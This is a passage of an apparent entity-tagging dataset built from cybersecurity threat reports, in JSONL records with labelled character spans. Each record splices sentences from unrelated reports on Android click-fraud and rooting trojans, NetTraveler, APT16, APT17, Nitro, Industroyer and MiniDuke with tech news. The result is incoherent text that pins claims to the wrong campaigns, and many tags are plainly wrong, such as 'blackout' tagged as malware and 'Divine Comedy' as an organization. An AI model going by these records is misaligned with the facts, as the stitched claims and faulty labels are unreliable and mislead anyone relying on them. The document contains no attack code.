These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": [{"start": 151, "end": 170, "label": "Organization"}, {"start": 229, "end": 244, "label": "System"}, {"start": 325, "end": 330, "label": "Organization"}, {"start": 338, "end": 354, "label": "Indicator"}, {"start": 492, "end": 498, "label": "Organization"}]} {"text": "Those apps use the same techniques to monetize their actions . Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks . Taiwanese citizens will go to the polls on January 16 , 2016 , to choose a new President and legislators . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": [{"start": 150, "end": 160, "label": "Organization"}, {"start": 356, "end": 380, "label": "System"}, {"start": 408, "end": 425, "label": "Organization"}, {"start": 440, "end": 449, "label": "Organization"}]} {"text": "Click fraud apps The authors ' tactics evolved from advertisement spam to real PHA ( Click Fraud ) . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . According to recent opinion polls , the Democratic Progressive Party ( DPP ) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election . 
Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": [{"start": 154, "end": 163, "label": "Malware"}, {"start": 172, "end": 190, "label": "Malware"}, {"start": 335, "end": 363, "label": "Organization"}, {"start": 366, "end": 369, "label": "Organization"}]} {"text": "Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies . The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland , and the party \u2019s victory would represent a shift away from the ruling Kuomintang \u2019s closer ties with the PRC . Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": [{"start": 138, "end": 152, "label": "Organization"}, {"start": 164, "end": 175, "label": "System"}, {"start": 468, "end": 471, "label": "Organization"}, {"start": 474, "end": 506, "label": "Organization"}, {"start": 563, "end": 587, "label": "Organization"}, {"start": 592, "end": 619, "label": "Organization"}, {"start": 636, "end": 652, "label": "Organization"}]} {"text": "This allows the PHA authors to monetize their apps more effectively than through regular advertising . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration . Since 1949 , Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence . The U.S. 
Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that \u201c advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data \u201d after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": [{"start": 137, "end": 148, "label": "System"}, {"start": 329, "end": 391, "label": "Organization"}, {"start": 424, "end": 436, "label": "Organization"}, {"start": 474, "end": 483, "label": "Organization"}, {"start": 500, "end": 541, "label": "Organization"}, {"start": 542, "end": 653, "label": "Indicator"}, {"start": 663, "end": 694, "label": "System"}]} {"text": "This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers , and impacts user experience by consuming their data plan resources . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan , or even drive Taiwan closer to independence . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": [{"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 309, "end": 327, "label": "System"}, {"start": 334, "end": 352, "label": "Organization"}, {"start": 386, "end": 389, "label": "Organization"}]} {"text": "The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
In 2005 , the Chinese government passed an \u201c anti-secession \u201d law that signified its intention to use \u201c non-peaceful \u201d means to stymie any Taiwanese attempt to secede from China . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": [{"start": 156, "end": 167, "label": "System"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 218, "end": 236, "label": "System"}, {"start": 253, "end": 271, "label": "Organization"}, {"start": 425, "end": 429, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}, {"start": 520, "end": 531, "label": "Organization"}, {"start": 550, "end": 553, "label": "Organization"}]} {"text": "The command & control server ( C & C server ) returns the URL to click along with a very long list of additional parameters in JSON format . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . APT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses . \u201c Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , \u201d the report states .", "spans": [{"start": 179, "end": 190, "label": "System"}, {"start": 212, "end": 225, "label": "Vulnerability"}, {"start": 241, "end": 259, "label": "System"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 295, "end": 301, "label": "System"}, {"start": 380, "end": 389, "label": "System"}]} {"text": "After rendering the ad on the screen , the app tries to identify the part of the advertisement website to click . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . 
The message subject read \u201c DPP \u2019s Contact Information Update \u201d , apparently targeting those interested in contact information for DPP members or politicians . ( CISA , CNN )", "spans": [{"start": 149, "end": 159, "label": "Malware"}, {"start": 165, "end": 183, "label": "Malware"}, {"start": 193, "end": 204, "label": "System"}, {"start": 213, "end": 229, "label": "Malware"}, {"start": 276, "end": 279, "label": "Organization"}, {"start": 379, "end": 382, "label": "Organization"}, {"start": 410, "end": 414, "label": "Organization"}, {"start": 417, "end": 420, "label": "Organization"}]} {"text": "If that part is found , the app loads Javascript snippets from the JSON parameters to click a button or other HTML element , simulating a real user click . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns . The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics , both to better anticipate the election outcome and to gather additional intelligence on politicians , activists , and others who interact with journalists . 
Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": [{"start": 156, "end": 167, "label": "System"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 218, "end": 241, "label": "Organization"}, {"start": 357, "end": 375, "label": "Organization"}, {"start": 619, "end": 661, "label": "Organization"}, {"start": 682, "end": 691, "label": "Organization"}, {"start": 771, "end": 777, "label": "System"}, {"start": 782, "end": 786, "label": "System"}]} {"text": "Because a user interacting with an ad often leads to a higher chance of the user purchasing something , ad networks often \" pay per click '' to developers who host their ads . WildFire correctly classifies NetTraveler as malicious . This tactic is not without precedent ; in 2013 , the New York Times revealed it had been the target of China based actors shortly after it reported on the alleged mass accumulation of wealth by then-Prime Minister Wen Jiabao and his family . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google \u2019s tracking pixels on their sites , potentially violating U.S. 
law and sharing taxpayers \u2019 information with those companies .", "spans": [{"start": 176, "end": 184, "label": "Organization"}, {"start": 206, "end": 217, "label": "System"}, {"start": 286, "end": 300, "label": "Organization"}, {"start": 483, "end": 503, "label": "Organization"}, {"start": 545, "end": 551, "label": "Organization"}, {"start": 554, "end": 563, "label": "Organization"}, {"start": 568, "end": 577, "label": "System"}, {"start": 591, "end": 595, "label": "Organization"}, {"start": 600, "end": 625, "label": "Organization"}, {"start": 635, "end": 640, "label": "System"}]} {"text": "Therefore , by simulating fraudulent clicks , these developers are making money without requiring a user to click on an advertisement . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists . The actors likely sought information on the newspaper \u2019s sources in China , who could be silenced by the government . The report says the data was kept anonymous , but the companies could \u201c easily \u201d use the information to identify individuals or create targeted advertising for them .", "spans": [{"start": 258, "end": 281, "label": "Organization"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 300, "end": 320, "label": "Organization"}, {"start": 342, "end": 362, "label": "Organization"}, {"start": 367, "end": 376, "label": "Organization"}]} {"text": "This example code shows a JSON reply returned by the C & C server . Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries . 
Compromising these Taiwanese news organizations would also allow the actors to gain access to informants or other protected sources , who might then be targeted for further intelligence collection or even retribution . ( Vox , USA Today )", "spans": [{"start": 74, "end": 87, "label": "Organization"}, {"start": 145, "end": 156, "label": "System"}, {"start": 519, "end": 522, "label": "Organization"}, {"start": 525, "end": 534, "label": "Organization"}]} {"text": "It has been shortened for brevity . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 \u2013 2013 . The webmail addresses , while unknown , were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": [{"start": 49, "end": 62, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 439, "end": 462, "label": "Vulnerability"}, {"start": 466, "end": 472, "label": "Organization"}]} {"text": "Based on this JSON reply , the app looks for an HTML snippet that corresponds to the active element ( show_hide btnnext ) and , if found , the Javascript snippet tries to perform a click ( ) method on it . Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications . As corporate networks become more secure and users become more vigilant , personal accounts can still offer a means to bypass security systems . 
Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": [{"start": 310, "end": 327, "label": "Organization"}, {"start": 330, "end": 344, "label": "Organization"}, {"start": 347, "end": 364, "label": "Organization"}, {"start": 367, "end": 380, "label": "Organization"}, {"start": 383, "end": 389, "label": "Organization"}, {"start": 392, "end": 400, "label": "Organization"}, {"start": 405, "end": 419, "label": "Organization"}, {"start": 567, "end": 572, "label": "Organization"}, {"start": 628, "end": 635, "label": "System"}, {"start": 640, "end": 645, "label": "System"}, {"start": 664, "end": 680, "label": "Vulnerability"}, {"start": 724, "end": 742, "label": "System"}, {"start": 755, "end": 761, "label": "System"}, {"start": 772, "end": 784, "label": "System"}]} {"text": "Rooting trojans The Zen authors have also created a rooting trojan . In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files . This tactic exploits users \u2019 reduced vigilance when reading their own personal email , even when using corporate IT equipment to do so . 
However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": [{"start": 20, "end": 23, "label": "Malware"}, {"start": 87, "end": 106, "label": "System"}, {"start": 119, "end": 159, "label": "Malware"}, {"start": 206, "end": 248, "label": "Malware"}, {"start": 410, "end": 415, "label": "System"}, {"start": 518, "end": 524, "label": "System"}, {"start": 573, "end": 581, "label": "System"}, {"start": 584, "end": 593, "label": "System"}, {"start": 598, "end": 602, "label": "System"}, {"start": 613, "end": 618, "label": "Organization"}]} {"text": "Using a publicly available rooting framework , the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device . During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . 
Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": [{"start": 182, "end": 195, "label": "Organization"}, {"start": 211, "end": 222, "label": "System"}, {"start": 387, "end": 400, "label": "Organization"}, {"start": 441, "end": 446, "label": "Organization"}, {"start": 519, "end": 539, "label": "Organization"}, {"start": 702, "end": 707, "label": "Organization"}, {"start": 731, "end": 734, "label": "System"}, {"start": 737, "end": 743, "label": "System"}, {"start": 748, "end": 753, "label": "System"}]} {"text": "Installing apps on the system partition makes it harder for the user to remove the app . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": [{"start": 89, "end": 102, "label": "Organization"}, {"start": 189, "end": 208, "label": "System"}, {"start": 221, "end": 245, "label": "System"}, {"start": 250, "end": 278, "label": "System"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 474, "end": 488, "label": "Malware"}, {"start": 540, "end": 556, "label": "Vulnerability"}, {"start": 587, "end": 696, "label": "Indicator"}]} {"text": "This technique only works for unpatched devices running Android 4.3 or lower . 
Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan . One of the media organizations involved in this latest activity was targeted in June 2015 , while its Hong Kong branch was similarly targeted in August 2015 . ( Forbes , Gizmodo ) \u2022 Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over \u2022 Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos \u2022 New Threat Actor Launches Cyber - attacks on Ukraine and Poland \u2022", "spans": [{"start": 56, "end": 67, "label": "System"}, {"start": 88, "end": 101, "label": "Organization"}, {"start": 650, "end": 656, "label": "Organization"}, {"start": 659, "end": 666, "label": "Organization"}, {"start": 695, "end": 726, "label": "Vulnerability"}, {"start": 730, "end": 744, "label": "System"}, {"start": 747, "end": 759, "label": "System"}, {"start": 793, "end": 820, "label": "System"}, {"start": 853, "end": 864, "label": "Organization"}, {"start": 893, "end": 908, "label": "Organization"}]} {"text": "Devices running Android 4.4 and higher are protected by Verified Boot . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . APT16 actors were likely also responsible for the June 2015 activity . 
Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation \u2022", "spans": [{"start": 16, "end": 27, "label": "System"}, {"start": 72, "end": 85, "label": "Organization"}, {"start": 109, "end": 134, "label": "Vulnerability"}, {"start": 182, "end": 209, "label": "Malware"}, {"start": 212, "end": 239, "label": "Malware"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 338, "end": 349, "label": "System"}, {"start": 354, "end": 368, "label": "System"}]} {"text": "Zen 's rooting trojan apps target a specific device model with a very specific system image . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper . They sent spear phishing messages with the subject \u201c 2015 Taiwan Security and Cultural Forum Invitation Form \u201d , and used a different tool \u2013 a tool that we refer to as DOORJAMB \u2013 in their attempt to compromise the organization . Talos Takes Ep .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 382, "end": 390, "label": "Malware"}, {"start": 443, "end": 448, "label": "Organization"}]} {"text": "After achieving root access the app tries to replace the framework.jar file on the system partition . Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks . A different group , known as admin@338 , used LOWBALL malware during its Hong Kong activity . 
# 147 : The dangers of \" Mercenary \" groups and the spyware they create Upcoming events where you can find Talos \u201c Most prevalent malware files \u201d is taking a break this week for maintenance .", "spans": [{"start": 57, "end": 70, "label": "Indicator"}, {"start": 180, "end": 198, "label": "System"}, {"start": 268, "end": 277, "label": "Indicator"}, {"start": 285, "end": 292, "label": "Malware"}, {"start": 358, "end": 376, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}]} {"text": "Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT . Despite the differing sponsorship , penetration of Hong Kong and Taiwan based media organizations continues to be a priority for China based threat groups . On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": [{"start": 12, "end": 25, "label": "Indicator"}, {"start": 85, "end": 92, "label": "System"}, {"start": 216, "end": 224, "label": "System"}, {"start": 229, "end": 260, "label": "System"}, {"start": 278, "end": 300, "label": "Organization"}, {"start": 519, "end": 527, "label": "Malware"}]} {"text": "In particular , these apps try to add an additional method called statistics ( ) into the Activity class . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . The difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets \u2019 geographic location . 
Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": [{"start": 242, "end": 250, "label": "System"}, {"start": 430, "end": 449, "label": "Organization"}, {"start": 505, "end": 516, "label": "Organization"}]} {"text": "When inserted , this method runs every time any Activity object in any Android app is created . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) . In other words , while media organizations are important targets , it is possible that two separate groups are responsible for Hong Kong and Taiwan , respectively . Shortly thereafter , ESET \u00ae researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": [{"start": 459, "end": 477, "label": "Organization"}, {"start": 503, "end": 514, "label": "Malware"}]} {"text": "This happens all the time in regular Android apps , as Activity is one of the fundamental Android UI elements . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample . The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility . They have named it Industroyer \u2013 the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": [{"start": 37, "end": 44, "label": "System"}, {"start": 90, "end": 97, "label": "System"}, {"start": 140, "end": 148, "label": "System"}, {"start": 206, "end": 221, "label": "System"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 261, "end": 281, "label": "Organization"}, {"start": 397, "end": 408, "label": "Malware"}, {"start": 433, "end": 465, "label": "System"}]} {"text": "The only purpose of this method is to connect to the C & C server . 
As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection . IRONHALO : CVE-2015-1701 . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use \u2013 systems developed decades ago with almost no security measures .", "spans": [{"start": 225, "end": 233, "label": "Malware"}, {"start": 236, "end": 249, "label": "Vulnerability"}]} {"text": "The Zen trojan After achieving persistence , the trojan downloads additional payloads , including another trojan called Zen . Attacks on the chemical industry are merely their latest attack wave . ELMER : CVE-2015-1701 . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 120, "end": 123, "label": "Malware"}, {"start": 141, "end": 158, "label": "Organization"}, {"start": 197, "end": 202, "label": "Malware"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 221, "end": 232, "label": "Organization"}]} {"text": "Zen requires root to work correctly on the Android operating system . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . These clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability , possibly by multiple threat groups . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 43, "end": 50, "label": "System"}]} {"text": "The Zen trojan uses its root privileges to turn on accessibility service ( a service used to allow Android users with disabilities to use their devices ) for itself by writing to a system-wide setting value enabled_accessibility_services . 
The attack wave started in late July 2011 and continued into midSeptember 2011 . Both Japan and Taiwan are important intelligence collection targets for China , particularly because of recent changes to Japan \u2019s pacifist constitution and the upcoming Taiwanese election . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 99, "end": 106, "label": "System"}, {"start": 512, "end": 523, "label": "Organization"}]} {"text": "Zen does n't even check for the root privilege : it just assumes it has it . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . Based on our visibility and available data , we only attribute one campaign to the Chinese APT group APT16 . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 303, "end": 308, "label": "Organization"}]} {"text": "This leads us to believe that Zen is just part of a larger infection chain . They then moved on to the motor industry in late May . APT17 . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": [{"start": 30, "end": 33, "label": "Malware"}, {"start": 103, "end": 117, "label": "Organization"}, {"start": 132, "end": 137, "label": "Organization"}, {"start": 142, "end": 156, "label": "Organization"}, {"start": 162, "end": 188, "label": "System"}, {"start": 207, "end": 232, "label": "System"}]} {"text": "The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services , chosen by checking the operating system version , to create new Google accounts . From late April to early May , the attackers focused on human rights related NGOs . 
FireEye Threat Intelligence and the Microsoft Threat Intelligence Center investigated a command-and-control ( C2 ) obfuscation tactic used on Microsoft \u2019s TechNet , a web portal for IT professionals . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": [{"start": 73, "end": 84, "label": "System"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 298, "end": 305, "label": "Organization"}, {"start": 334, "end": 343, "label": "Organization"}, {"start": 386, "end": 405, "label": "System"}, {"start": 408, "end": 410, "label": "System"}, {"start": 440, "end": 449, "label": "Organization"}, {"start": 453, "end": 460, "label": "System"}]} {"text": "This is done by opening the Google account creation process and parsing the current view . Attackers then moved on to the motor industry in late May . TechNet \u2019s security was in no way compromised by this tactic , which is likely possible on other message boards and forums . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 122, "end": 136, "label": "Organization"}, {"start": 151, "end": 158, "label": "System"}]} {"text": "The app then clicks the appropriate buttons , scrollbars , and other UI elements to go through account sign-up without user intervention . At this point , the current attack campaign against the chemical industry began . FireEye Threat Intelligence assesses that APT17 , a China based threat group , was behind the attempt . 
The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": [{"start": 195, "end": 212, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}]} {"text": "During the account sign-up process , Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA . The attackers first researched desired targets and then sent an email specifically to the target . Other groups have used legitimate websites to host C2 IP address in the past . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 286, "end": 288, "label": "System"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 371, "end": 399, "label": "Vulnerability"}]} {"text": "To get around this , the app then uses its root privilege to inject code into the Setup Wizard , extract the CAPTCHA image , and sends it to a remote server to try to solve the CAPTCHA . First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners . APT17 was embedding the encoded C2 IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \u201c dead drop resolver. \u201d Encoding the IP address makes it more difficult to identify the true C2 address for network security professionals . 
We called this new malware ?", "spans": [{"start": 325, "end": 330, "label": "Organization"}, {"start": 357, "end": 359, "label": "System"}, {"start": 379, "end": 390, "label": "Malware"}, {"start": 413, "end": 422, "label": "Organization"}, {"start": 423, "end": 430, "label": "System"}, {"start": 618, "end": 620, "label": "System"}, {"start": 685, "end": 692, "label": "Malware"}]} {"text": "It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out . Few security companies have publicly discussed this tactic . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? Divine Comedy .", "spans": [{"start": 321, "end": 328, "label": "Malware"}, {"start": 355, "end": 359, "label": "Malware"}, {"start": 433, "end": 448, "label": "Organization"}, {"start": 455, "end": 468, "label": "Organization"}]} {"text": "After the server returns the solution , the app enters it into the appropriate text field to complete the CAPTCHA challenge . Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update . After discovering the BLACKCOFFEE activity , the FireEye-Microsoft team encoded a sinkhole IP address into the profile pages and forum threads and locked the accounts to prevent the threat actors from making any changes . 
Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": [{"start": 278, "end": 289, "label": "Malware"}, {"start": 305, "end": 322, "label": "Organization"}, {"start": 515, "end": 571, "label": "Indicator"}, {"start": 574, "end": 589, "label": "Vulnerability"}]} {"text": "The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States . This collaborative approach allowed the team to observe the malware and its victims . Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 206, "end": 209, "label": "System"}, {"start": 355, "end": 365, "label": "Organization"}, {"start": 466, "end": 486, "label": "Organization"}]} {"text": "It 's one of the strings - \" How you 'll sign in '' - that it looks for during the account creation process . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu . Though the security community has not yet broadly discussed this technique , FireEye has observed other threat groups adopting these measures and expect this trend to continue on other community sites . For the CrySyS Lab analysis , please read [ here ] .", "spans": [{"start": 142, "end": 145, "label": "System"}, {"start": 150, "end": 159, "label": "System"}, {"start": 201, "end": 214, "label": "System"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 428, "end": 438, "label": "Organization"}]} {"text": "The code snippet below shows part of the screen parsing process . 
This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . Today , FireEye released Indicators of Compromise ( IOCs ) for BLACKCOFFEE and Microsoft released signatures for its anti-malware products . The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": [{"start": 204, "end": 211, "label": "Organization"}, {"start": 259, "end": 270, "label": "Malware"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 341, "end": 359, "label": "Organization"}]} {"text": "Apart from injecting code to read the CAPTCHA , the app also injects its own code into the system_server process , which requires root privileges . The Sogu gang use a custom developed threat \u2013 Backdoor.Sogu , whereas the group described in this document use an off the shelf threat \u2013 Poison Ivy . APT17 , also known as DeputyDog , is a Chinabased threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": [{"start": 194, "end": 207, "label": "System"}, {"start": 285, "end": 295, "label": "System"}, {"start": 298, "end": 303, "label": "Organization"}, {"start": 320, "end": 329, "label": "Organization"}, {"start": 366, "end": 373, "label": "Organization"}, {"start": 636, "end": 685, "label": "Organization"}]} {"text": "This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails . 
BLACKCOFFEE \u2019s functionality includes uploading and downloading files ; creating a reverse shell ; enumerating files and processes ; renaming , moving , and deleting files ; terminating processes ; and expanding its functionality by adding new backdoor commands . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": [{"start": 230, "end": 233, "label": "System"}, {"start": 238, "end": 247, "label": "System"}, {"start": 285, "end": 296, "label": "Malware"}]} {"text": "The app also creates hooks to prevent the phone from rebooting , going to sleep or allowing the user from pressing hardware buttons during the account creation process . These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . FireEye has monitored APT17 \u2019s use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the C2 communication as queries to web search engines . 
These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": [{"start": 208, "end": 224, "label": "Organization"}, {"start": 292, "end": 313, "label": "Organization"}, {"start": 320, "end": 346, "label": "Organization"}, {"start": 395, "end": 404, "label": "Organization"}, {"start": 416, "end": 442, "label": "Organization"}, {"start": 445, "end": 452, "label": "Organization"}, {"start": 467, "end": 472, "label": "Organization"}, {"start": 483, "end": 494, "label": "Malware"}, {"start": 593, "end": 595, "label": "System"}, {"start": 651, "end": 670, "label": "Malware"}, {"start": 707, "end": 742, "label": "System"}]} {"text": "These hooks are created using the root access and a custom native code called Lmt_INJECT , although the algorithm for this is well known . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . The use of BLACKCOFFEE demonstrates threat actors \u2019 evolving use of public websites to hide in plain sight . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": [{"start": 139, "end": 144, "label": "Organization"}, {"start": 172, "end": 187, "label": "Organization"}, {"start": 317, "end": 328, "label": "Malware"}]} {"text": "First , the app has to turn off SELinux protection . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In the past , threat actors would modify easily compromised websites to host C2 commands and configuration , as observed in the China based APT1 \u2019s WEBC2 suite of backdoors . 
